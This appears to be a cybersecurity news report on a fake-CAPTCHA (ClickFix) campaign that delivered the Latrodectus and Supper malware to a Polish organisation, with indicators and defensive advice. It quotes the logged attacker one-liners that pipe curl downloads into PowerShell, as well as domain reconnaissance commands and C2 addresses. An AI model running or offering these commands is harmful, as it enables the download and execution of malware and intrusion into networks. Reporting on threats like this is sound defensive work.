Tuesday, September 8, 2026

Fake CAPTCHA Attack Chain Triggers Enterprise-Wide Malware Infection in Organizations

Fake CAPTCHA (ClickFix) pages are enabling threat actors to turn a single user click into an enterprise‑wide compromise, as seen in a recent incident affecting a major Polish organization.

The campaign chained social engineering, DLL side‑loading, and dual malware families (Latrodectus and Supper) to gain persistence, perform reconnaissance, and prepare the environment for potential follow‑on attacks.

Instead of a real human verification, the page instructed the user to press Win+R, paste a pre‑copied command and execute it, effectively convincing the victim to run a malicious PowerShell one‑liner. In this case, logs showed commands such as:

cmd /c curl naintn.com/amazoncdn.com/... | powershell and
cmd /c curl jzluw.com/cdn-dynmedia-1.microsoft.com/... | powershell,

which downloaded and executed further payloads from attacker‑controlled domains. Similar ClickFix chains have been widely used in recent campaigns to deliver loaders, stealers and remote access tools to Windows systems.

The incident began when an employee landed on a compromised website that displayed a fake Cloudflare‑style CAPTCHA page using the ClickFix technique.

Latrodectus Loader

On one infected workstation, investigators found a suspicious %APPDATA%\Intel directory containing igfxSDK.exe, version.dll , and wtsapi32.dll, a classic pattern of DLL side‑loading in which a legitimate executable is abused to load a malicious library.

Fake CAPTCHA (Source : CERT.PL).
Fake CAPTCHA (Source : CERT.PL).

Disk scans additionally revealed two oddly named DLLs (245282244.dll and 760468301.dll) under the user’s local AppData path, all tied into the same infection chain.

Dynamic analysis of wtsapi32.dll showed outbound requests to domains such as gasrobariokley.com and fadoklismokley.com, with URL parameters carrying OS, architecture, username and a campaign‑specific group value.

After unpacking the obfuscated code, the sample matched the Latrodectus family, a loader and backdoor often seen as a staging point for more destructive payloads.

Version information in the traffic suggested Latrodectus v2.3, a newer build that retains many behaviors of earlier variants while adding updated anti‑analysis techniques such as blocking execution under common tools and unhooking ntdll.dll to evade security products.

Recovered strings showed Latrodectus performing extensive host and domain reconnaissance via scripted cmd.exe calls (for example systeminfo, ipconfig /all, nltest /domain_trusts, and net group “Domain Admins” /domain) and querying installed antivirus products, giving attackers a detailed view of the environment.

Threat intelligence has also highlighted that the group parameter in Latrodectus HTTP requests is an FNV‑1a hash of the campaign name, enabling defenders to cluster activity and attribute specific operations to distinct ClickFix‑driven campaigns.

Supper Malware: C2, Persistence and Enterprise

Further analysis identified two additional DLLs linked to the Supper malware family, often observed as a pre‑ransomware component in modern intrusion playbooks.

The unpacked samples used DllRegisterServer as the entry point and contacted hard‑coded C2 endpoints, including 162.19.199.110:4043, 185.233.166.27:443 and 85.239.54.130 on multiple ports, with some IPs mirrored in reverse byte order as a fallback.

To maintain persistence, the malware created a Scheduled Task named GoogleUpdateTask and wrapped it in a command that both executed its payload and cleaned up the task afterward, complicating forensic reconstruction.​

Network protocol analysis showed that Supper transmits a structured message containing server IP, computer name, user name and domain to the C2, then receives encrypted tasking that can update C2 lists, run arbitrary programs and enable SOCKS proxy capabilities for interactive access.

This combination of reconnaissance by Latrodectus and flexible command‑and‑control by Supper means that a single user’s mistake on a fake CAPTCHA page can rapidly escalate into domain‑wide lateral movement, data theft or ransomware staging inside an organization.

ClickFix and Fake CAPTCHA attacks exploit user trust in everyday web friction, turning routine “prove you’re human” prompts into covert malware launchers.

Defenders should pair user awareness training with strict monitoring of clipboard‑driven Run‑dialog executions, unusual cmd.exe– and PowerShell‑based download patterns, and known Latrodectus/Supper indicators such as %APPDATA%\Intel, suspicious DLL side‑loading chains and characteristic C2 domains and IP addresses.

Follow us on Google NewsLinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.

Mayura Kathir
Mayura Kathirhttps://gbhackers.com/
Mayura Kathir is a cybersecurity reporter at GBHackers News, covering daily incidents including data breaches, malware attacks, cybercrime, vulnerabilities, zero-day exploits, and more.

Hot this week

How To Access Dark Web Anonymously and know its Secretive and Mysterious Activities

What is Deep Web The deep web, invisible web, or...

How to Build and Run a Security Operations Center (SOC Guide) – 2023

Today’s Cyber security operations center (CSOC) should have everything...

Russian Hackers Bypass EDR to Deliver a Weaponized TeamViewer Component

TeamViewer's popularity and remote access capabilities make it an...

Web Server Penetration Testing Checklist – 2026

Web server pentesting is performed under three significant categories: identity,...

ATM Penetration Testing – Advanced Testing Methods to Find The Vulnerabilities

ATM Penetration testing, Hackers have found different approaches to...

Known npm Worm Returns After 111 Days and Security Scanning Still Let It Through

A known Shai-Hulud npm worm payload has resurfaced after...

Switzerland Builds Open-Source Workplace Platform to Operate Alongside Microsoft 365

Switzerland’s Federal Chancellery is advancing a sovereign digital workplace...

Mathspace Data Breach Exposes Personal Data of Over 1 Million Students, Parents and Staff

Mathspace, an online mathematics learning platform used by schools...

New InjectEave Attack Lets Hackers Eavesdrop on Headphone Audio From 30 Meters Away

Security researchers have unveiled InjectEave, an electromagnetic side-channel attack...

PoisonedRefresh Malware Backdoors F5 BIG-IP Servers With Memory-Only PHP Web Shells

A sophisticated Linux implant linked to compromised F5 BIG-IP...

Natural Resources Wales Data Breach Exposes Sensitive Employee Diversity Data

Natural Resources Wales (NRW) has reported a personal data...

ConnectWise ScreenConnect Remote Access Flaw Impacts Guest File Transfer Sessions

ConnectWise has announced a security issue affecting file transfer...

Related Articles

Recent News